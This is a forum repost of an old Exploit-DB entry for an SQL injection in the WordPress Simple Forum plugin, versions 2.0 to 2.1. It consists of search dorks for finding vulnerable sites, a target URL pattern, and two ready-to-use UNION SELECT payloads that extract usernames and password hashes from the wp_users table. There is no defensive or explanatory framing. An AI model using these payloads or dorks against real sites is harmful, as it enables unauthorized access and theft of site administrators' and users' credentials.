Exploit WordPress Plugin Simple Forum 2.0 < 2.1 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5126
Проверка EDB
  1. Пройдено
Автор
S@BUN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2008-02-15
Код:
###############################################################
#
# Simple Forum Version 2.0-2.1(sf-forum)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAÄ°L : [email protected]
#
################################################################

DORKS 1 :

Simple Forum - Version 2.0 (Build 207)
Simple Forum - Sürüm 2.1 (Build 228)
Simple Forum - Version 2.1 (Build 236)

DORK 2 : allinurl: "sf-forum?forum"

################################################################
example :

http://www.xxx.com/sf-forum?forum=[exploit]

EXPLOIT 1 :

-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

exploit 2 :

-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*

################################################################
# S@BUN               i AM NOT HACKER               S@BUN
################################################################

# milw0rm.com [2008-02-15]
 
Источник
www.exploit-db.com

Похожие темы